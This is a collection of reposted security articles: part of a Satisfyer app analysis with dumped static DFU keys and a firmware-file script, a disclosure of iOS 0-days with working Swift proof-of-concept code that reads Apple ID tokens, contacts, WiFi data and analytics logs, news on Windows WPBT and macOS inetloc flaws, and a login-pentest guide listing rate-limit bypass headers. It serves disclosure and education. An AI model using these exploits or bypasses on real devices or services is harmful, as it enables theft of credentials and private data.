As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.

This sounds different than what the Satisfyer app is currently using, since it uses an admin account with a static password. In fact, coturn servers offer a web interface that’s only reachable via HTTPS that allow admin users to login. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let’s just hope this panel is not accessible, right? RIGHT?

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something into a test device is a firmware package of the vendor. Unfortunately, all of my Satisfyer devices were already shipped to me with up-to-date firmware. There’s an API endpoint that allows downloading firmware images but it requires brute forcing various parameter values and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I’ve found a way to trigger the update process, that is calling updateFirmware(path) of the class ToyHolderController. A great way to see what’s actually going on is to place hooks in any classes used for logging purposes. In case of Satisfyer Connect, the ZLogger class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
(1)01
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED

Based on the debug messages, I’ve started to build a file that can be flashed on the device. I’ve lost interest in that shortly after but in case my results are helpful for anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

FILE = ""

# header
FILE += "\x47\x4D"

# sizeOfMergedFile
FILE += "\x3e\x00\x00\x00"

FILE += "CCDDXXFFGGHHIIJJKKLLMMNNOOPPQQRR"

# extension
FILE += "\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += "\x01\x00\x00\x00"

# start addr
FILE += "\x10\x00"

# download addr
FILE += "\x10\x00"

FILE +="\x05\x00\x00\x00"

FILE += "ZZaa"

### image file 1

# ic version
FILE += "\x05"

# secure version
FILE += "\x00"

# no idea
FILE += "\x13\x37"

# image id
FILE +="\x01\x01"

# crc16
FILE += "\x8e\x04"

# size
FILE +="\x40\x00\x00\x00"

for i in range(0x40):
    FILE += "A"

with open("./thefile.bin", "w") as f:
    f.write(FILE)

If anybody happens to have a flashable Satisfyer .bin file lying around, I’ll offer $13.37 PayPal for it, I swear.


Timeline

  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to security@satisfyer.com.
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to security@satisfyer.com.
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to security@satisfyer.com and app.support@satisfyer.com.
  • 06/30/2021: Received acknowledgement, agreed that blog post will be released in max. two weeks, or before in case the vulnerability was fixed earlier.
  • 07/14/2021: Publishing blog post.

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Original text by Denis Tokarev @illusionofchaos

I want to share my frustrating experience participating in Apple Security Bounty program. I’ve reported four 0-day vulnerabilities this year between March 10 and May 4, as of now three of them are still present in the latest iOS version (15.0) and one was fixed in 14.7, but Apple decided to cover it up and not list it on the security content page. When I confronted them, they apologized, assured me it happened due to a processing issue and promised to list it on the security content page of the next update. There were three releases since then and they broke their promise each time.

Ten days ago I asked for an explanation and warned then that I would make my research public if I don’t receive an explanation. My request was ignored so I’m doing what I said I would. My actions are in accordance with responsible disclosure guidelines (Google Project Zero discloses vulnerabilities in 90 days after reporting them to vendor, ZDI — in 120). I have waited much longer, up to half a year in one case.

I’m not the first person that is unhappy with Apple Security Bounty program. Here are some other reports and opinions:

Here are links to GitHub repositories that contain PoC source code that I’ve sent to Apple. Each repository contains an app that gathers sensitive information and presents it in the UI.

Gamed 0-day

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows to access at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about all user’s interaction with these contacts (including timestamps and statistics), also some attachments (like URLs and texts)
  • Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creation and modification dates (I’ve just checked on iOS 15 and this one inaccessible, so that one must have been quietly fixed recently)

Here is a short proof of concept (this one won’t actually compile, see GitHub repo for a workaround).

let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
    }

    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
    }
}

How it happens:

  • XPC service com.apple.gamed doesn’t properly check for com.apple.developer.game-center entitlement
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountServiceGKFriendServiceGKUtilityService, etc.).
  • If game center is enabled on the device (even if it’s not enabled for the app in App Store Connect and app doesn’t contain com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing Apple ID of the user, DSID and Game Center authentication token (which allows to send requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing first and last name of the user’s Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService return an object with information about user’s friend in Game Center.
  • Even if game center is disabled, it’s not enabled for the app in App Store Connect and app doesn’t contain com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows to read arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following: /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist — contains mobile gestalt cache /var/mobile/Library/CoreDuet/People/interactionC.db — contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user’s interaction with these contacts (including timestamps and statistics) /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist — contains favorite contacts and their phone numbers /var/mobile/Library/AddressBook/AddressBook.sqlitedb — contains complete Address Book database /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb — contains photos of Address book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).

Nehelper Enumerate Installed Apps 0-day

The vulnerably allows any user-installed app to determine whether any app is installed on the device given its bundle ID.

XPC endpoint com.apple.nehelper has a method accessible to any app that accepts a bundle ID as a parameter and returns an array containing some cache UUIDs if the app with matching bundle ID is installed on the device or an empty array otherwise. This happens in -[NEHelperCacheManager onQueueHandleMessage:] in /usr/libexec/nehelper.

func isAppInstalled(bundleId: String) -> Bool {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)!
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
    xpc_dictionary_set_uint64(xdict, "cache-command", 3)
    xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Nehelper Wifi Info 0-day

XPC endpoint com.apple.nehelper accepts user-supplied parameter sdk-version, and if its value is less than or equal to 524288, com.apple.developer.networking.wifi-info entiltlement check is skipped. Ths makes it possible for any qualifying app (e.g. posessing location access authorization) to gain access to Wifi information without the required entitlement. This happens in -[NEHelperWiFiInfoManager checkIfEntitled:] in /usr/libexec/nehelper.

func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}

Analyticsd (fixed in iOS 14.7)

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day… and Analytics-Daily…). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events)
  • menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user’s action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That’s why it’s very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if «Share analytics» was turned off in settings.

func analytics_json() -> String? {
	let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
	let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    return xpc_dictionary_get_string(reply, "log-dump");
}

Timeline:

April 29 2021 — I sent a detailed report to Apple

April 30 2021 — Apple replied that they had reviewed the report and are investigated

May 20 2021 — I’ve requested a status update from Apple (and recieved no reply)

May 30 2021 — I’ve requested a status update from Apple

June 3 2021 — Apple replied that they plan to address the issue in the upcoming update

July 19 2021 — iOS 14.7 is released with the fix

July 20 2021 — I’ve requested a status update from Apple

July 21 2021 — iOS 14.7 security contents list is published, this vulnerability is not mentioned

July 22 2021 — I’ve asked Apple a question why the vulnerability is not on the list Same day I receive the following reply: Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience.

July 26 2021 — iOS 14.7.1 security contents list is published, still no mention of this vulnerability

September 13 2021 — iOS 14.8 security contents list is published, still no mention of this vulnerability. Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon

September 20 2021 — iOS 15.0 security contents list is published, still no mention of this vulnerability

September 24 2021 — I still haven’t received any reply so I publish this article

UPDATE:

September 25 2021 — exactly 24 hours after this publication I finally received a reply from Apple. Here is what is said:

We saw your blog post regarding this issue and your other reports. We apologize for the delay in responding to you.

We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance. 

Please let us know if you have any questions.

A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit

A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit

Original text by Ravie Lakshmanan

Security researchers have disclosed an unpatched weakness in Microsoft Windows Platform Binary Table (WPBT) affecting all Windows-based devices since Windows 8 that could be potentially exploited to install a rootkit and compromise the integrity of devices.

«These flaws make every Windows system vulnerable to easily-crafted attacks that install fraudulent vendor-specific tables,» researchers from Eclypsium said in a report published on Monday. «These tables can be exploited by attackers with direct physical access, with remote access, or through manufacturer supply chains. More importantly, these motherboard-level flaws can obviate initiatives like Secured-core because of the ubiquitous usage of ACPI [Advanced Configuration and Power Interface] and WPBT.»

WPBT, introduced with Windows 8 in 2012, is a feature that enables «boot firmware to provide Windows with a platform binary that the operating system can execute.»

In other words, it allows PC manufacturers to point to signed portable executables or other vendor-specific drivers that come as part of the UEFI firmware ROM image in such a manner that it can be loaded into physical memory during Windows initialization and prior to executing any operating system code.

The main objective of WPBT is to allow critical features such as anti-theft software to persist even in scenarios where the operating system has been modified, formatted, or reinstalled. But given the functionality’s ability to have such software «stick to the device indefinitely,» Microsoft has warned of potential security risks that could arise from misuse of WPBT, including the possibility of deploying rootkits on Windows machines.

«Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions,» the Windows maker notes in its documentation. «In particular, WPBT solutions must not include malware (i.e., malicious software or unwanted software installed without adequate user consent).»

The vulnerability uncovered by the enterprise firmware security company is rooted in the fact that the WPBT mechanism can accept a signed binary with a revoked or an expired certificate to completely bypass the integrity check, thus permitting an attacker to sign a malicious binary with an already available expired certificate and run arbitrary code with kernel privileges when the device boots up.

In response to the findings, Microsoft has recommended using a Windows Defender Application Control (WDAC) policy to tightly control what binaries can be permitted to run on the devices.

The latest disclosure follows a separate set of findings in June 2021, which involved a set of four vulnerabilities — collectively called BIOS Disconnect — that could be weaponized to gain remote execution within the firmware of a device during a BIOS update, further highlighting the complexity and challenges involved in securing the boot process.

«This weakness can be potentially exploited via multiple vectors (e.g., physical access, remote, and supply chain) and by multiple techniques (e.g., malicious bootloader, DMA, etc),» the researchers said. «Organizations will need to consider these vectors, and employ a layered approach to security to ensure that all available fixes are applied and identify any potential compromises to devices.»

10 Most Common Security Issues Found in Login Functionalities

10 Most Common Security Issues Found in Login Functionalities

Original text by Harsh Bothra

During penetration testing and vulnerability assessment, the login functionalities are often encountered in some way or another. Most of the time, they are public-facing login portals where any user can attempt to log in to gain access to their accounts; on the other hand, sometimes, these login panels are restricted to specific users. The login functionality acts as a gateway that you need to unlock successfully to further access the application to its full potential. From a threat actor’s perspective, the login functionality is the main barrier to gain an initial foothold. Hence, it is essential from a penetration tester’s perspective to ensure that the login functionality implemented in the application is robust and secure against all types of vulnerabilities and misconfigurations.

This blog will discuss the common vulnerabilities or misconfigurations that a threat actor can exploit on login functionality and some remediations around it. For this purpose, we will be following the mindmap as mentioned above:

Vulnerability Test Cases

Default Credentials

Often, on the admin panels, third party software integrations, etc., that come with a pair of default credentials are left as it is. This may allow an attacker to enumerate the third party service and look for its default credentials. These credentials are usually privileged admin users and may allow an attacker to gain a complete foothold in the application.

Default Credentials List: https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials

For example, an admin panel using default credentials such as “admin:admin” is easy to guess and may allow an attacker to gain access to the respective admin panel as the highest privileged user.

Remediation: To remediate this issue, the developers need to ensure that the default credentials are disabled/changed and a strong pair of non-guessable credentials are enforced.

User Enumeration

There are multiple scenarios where when a user provides an invalid username, the application responds with a verbose error message stating that the user doesn’t exist. There are other ways to identify this as well, such as:

  1. Error Message: Difference in the error message when a valid/invalid user name is provided.
  2. Timing Difference: Difference in server response timing when a valid/invalid user name is provided.
  3. Application-Specific Behaviour: In specific scenarios, there may be behaviour patterns that are specific to the application’s implemented login flow, and it may require additional observation to conclude if a user exists or not.

These issues may allow a threat actor to enumerate all the valid user’s of the application and further use them to perform targeted attacks such as brute-forcing and social engineering.

Remediation: To remediate this issue, the developers need to implement proper handling so that the application doesn’t reveal any verbose error message on a valid/invalid username. Only a generic message is displayed. Similarly, the timing difference should not be significant enough to allow user enumeration.

Missing Brute-Force Protection

Most of the time, the login pages are accessible to the world, and the application allows any user to register and log in. In this chance, a user might have used a weak or guessable password increase. Suppose an application allows a user to attempt login irrespective of the failed attempts and fails to block the attempt. In that case, it may give a threat actor a window of opportunity to perform a brute-force attack and guess the password of the victim user. 

Bypass Methods: Often the application implementation a rate limiting or captcha mechanism to restrict the brute-force attempts, however, there are multiple methods to bypass this implementation including but not limited to: 

  1. Using the various HTTP Request Headers such as below mentioned. You can find Top Headers in the dataset from Project Resonance Wave 2.
    • X-Originating-IP: 127.0.0.1
    • X-Forwarded-For: 127.0.0.1
    • X-Remote-IP: 127.0.0.1
    • X-Remote-Addr: 127.0.0.1
    • X-Client-IP: 127.0.0.1
    • X-Host: 127.0.0.1
    • X-Forwared-Host: 127.0.0.1
  2. Using null bytes (%00) in the vulnerable parameters
  3. Sending the request without captcha parameter
  4. Adding fake parameters with the same “key”:”value”
  5. Limiting the threads or checking for race conditions
  6. Changing user-agents, cookies, and IP address
  7. Using IP rotation Burp Extensions to bypass IP based restrictions

To test this issue, simply use Burp’s Intruder feature or any custom brute-force script with a password wordlist of 200 passwords having an actual password in the list. Suppose the application doesn’t restrict the invalid attempts and provides a successful response on a valid password. In that case, it is an indication that the application doesn’t implement any sort of brute-force protection.

2c

Remediation: To remediate this issue a developer may implement rate-limiting or CAPTCHA as an anti-automation mechanism. 

Credentials Over Unencrypted Channel

If the application accepts the credentials and logs in a user over an unencrypted communication channel, i.e. over HTTP protocol instead of HTTPS, the communication is vulnerable to man in the middle attack. An attacker may be able to sniff in the network and steal sensitive information.

3c

Remediation: To remediate this issue, the developers need to strictly enforce HTTPS so that the application doesn’t communicate over HTTP. As a best practice, the developers should implement HSTS headers across all the subdomains as well.

Additionally, implementing Secure Flag on the session cookies that were fetched after login over HTTPS, ensures that the cookies are not stolen over the unencrypted channel. The secure flag protects cookies to be stolen over an unencrypted channel or via attacks like man-in-the-middle attack.

Cross-Site Scripting

The login pages may also be vulnerable to cross-site scripting under multiple scenarios. However, these are generally authenticated but can still be used to perform malicious actions such as redirecting a user to an attacker-controlled website and social engineering them to get hold of their credentials.

Let’s assume an application having a login page reflects the invalid username in the error message. This username is also present in the URL like: www.something.com/login/?user=harsh; now, an attacker may attempt to execute a reflected type of cross-site scripting in the user parameter by sending a malicious javascript payload. 

Remediation: To remediate this issue the developers can implement a proper input validation and sanitising on the input fields and not reflect user-supplied input in the error messages.

Additionally, implementing a HTTPOnly flag on the session cookies can protect sensitive cookies from being stolen using scripting attacks.

Parameter Pollution & Mass Assignment

A simple security misconfiguration may allow an attacker to bypass the authentication and gain unauthorised access to the victim user’s account. In this attack scenario, an attacker may attempt to bind multiple values to the same key or define various key-value pairs, i.e. using multiple usernames in username parameters or using multiple username parameters themselves. The way a server processes this may allow an attacker to access another user’s account.

4c

Remediation: To remediate this issue, the developers need to ensure that the application discards the use of multiple key-value pairs and only accepts one at a time to avoid this attack. Also, developers would need to check if any additional parameter is added to the original request and discard all the additional parameters, accepting the originally supplied parameters only. 

SQL/NoSQL/LDAP/XML Injection

This is one of the most common attacks that comes to one’s mind when we talk about login functionality. Based on the implementation used in the login functionality, an attacker may attempt to bypass it by injecting SQL/NoSQL/LDAP/XML injection payloads and gain access to the victim’s account.

5c

Remediation: To remediate this issue, the developers must ensure that the user-supplied input is validated correctly and security best practices for implementing database queries are followed. You can find a detailed guide at: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Sensitive Information Disclosure

While performing a login action, it is often observed that some applications store the credentials in response or the javascript files. An attacker may attempt to identify a way to extract the credentials from the response or javascript files. Also, in some cases, the application access may show additional information that may belong to other users or the application server itself and may help further exploitation.

6c

Remediation: To remediate this issue, the developers must ensure that the application doesn’t cache or store sensitive information such as credentials in an insecure place such as server response or javascript files.

Response Manipulation

Often, it is observed that the application returns “success”:false or “success”:true or similar responses when an invalid vs a valid set of credentials is supplied. However, if the application is not performing the server-side validation properly, it is possible to manipulate the response; for example, changing the “success”:false to “success”:true may allow an attacker to gain unauthorised access to the victim’s access account. This attack mainly results in success where the authentication token or cookie generation logic lies at the client-side, which is a bad practice.

Similarly, in many scenarios, the application also uses different response status codes such as 403, 200, etc. It is possible to change the status code from 403 to 200 to bypass the restriction and attempt to gain successful access to the victim’s account.

Remediation: To remediate this issue, the developers need to make sure that the server-side validation is in place and any attempts of client-side manipulation are discarded.

Authentication Bypass

In certain situations, it is impossible to bypass the authentication directly. Still, it is possible to access some specific endpoints or pages by directly navigating to them or in any other way possible. This allows an attacker to bypass the restrictions of required authentication and allows an unauthorised attacker to access those functionalities.

For Example: An unauthenticated attacker performs a directory enumeration and identifies an endpoint /goto/administrator/ which is directly accessible to him without any restrictions.

Remediation: To remediate this issue, developers would be required to ensure that all the authenticated endpoints are adequately placed behind the authentication and a proper authorisation check is implemented.

Bonus: Cross-Site Request Forgery (with a twist)

Usually, most applications are vulnerable to log in based CSRF issues, but there is no security impact in general. Thats’s what you are thinking, right? However, when an application utilizes the Single Sign-On method, the login CSRF comes in handy. This may allow an attacker to connect the victim user’s account to an attacker-controlled entity and can further be used to steal sensitive information or perform malicious actions. 

Example Report: https://hackerone.com/reports/171398

Remediation:  To remediate this issue, the developers must ensure that the state parameter is implemented and appropriately validated.

Apart from the above-mentioned vulnerabilities in the login page, several other vulnerabilities arise when third party integrations are used for authentication such as SAML, OAuth2.0 or other third party services. However, these authentication mechanisms are themselves a vast topic to understand and explore. We will soon be coming up with a separate series on Single Sign On (SSO) and JWT related attack vectors.

New macOS zero-day bug lets attackers run commands remotely

New macOS zero-day bug lets attackers run commands remotely

Original text by Sergiu Gatlan

Security researchers disclosed today a new vulnerability in Apple’s macOS Finder, which makes it possible for attackers to run arbitrary commands on Macs running any macOS version up to the latest release, Big Sur.

Zero-days are publicly disclosed flaws that haven’t been patched by the vendor which, in some cases, are also actively exploited by attackers or have publicly available proof-of-concept exploits.

The bug, found by independent security researcher Park Minchan, is due to how macOS processes inetloc files, which inadvertently causes it to run any commands embedded by an attacker inside without any warnings or prompts.

On macOS, Internet location files with .inetloc extensions are system-wide bookmarks that can be used to open online resources (news://, ftp://, afp://) or local files (file://).

«A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands,» an SSD Secure Disclosure advisory published today revealed.

«These files can be embedded inside emails which if the user clicks on them will execute the commands embedded inside them without providing a prompt or warning to the user.»

macOS zero-day demo
Image: SSD Secure Disclosure

Apple botches patch, doesn’t assign a CVE ID

While Apple silently fixed the issue without assigning a CVE identification number, as Minchan later discovered, Apple’s patch only partially addressed the flaw as it can still be exploited by changing the protocol used to execute the embedded commands from file:// to FiLe://.

«Newer versions of macOS (from Big Sur) have blocked the file:// prefix (in the com.apple.generic-internet-location) however they did a case matching causing File:// or fIle:// to bypass the check,» the advisory adds.

«We have notified Apple that FiLe:// (just mangling the value) doesn’t appear to be blocked, but have not received any response from them since the report has been made. As far as we know, at the moment, the vulnerability has not been patched.»

Although the researcher did not provide any info on how attackers might abuse this bug, it could potentially be used by threat actors to create malicious email attachments that would be able to launch a bundled or remote payload when opened by the target.

BleepingComputer also tested the proof-of-concept exploit shared by the researcher and confirmed that the vulnerability could be used to run arbitrary commands on macOS Big Sur using specially crafted files downloaded from the Internet without any prompts or warnings.

An .inetloc file with the PoC code was not detected by any of the antimalware engines on VirusTotal which means that macOS users potentially targeted by threat actors using this attack method won’t be protected by security software.

An Apple spokesperson was not available for comment when contacted by BleepingComputer earlier today.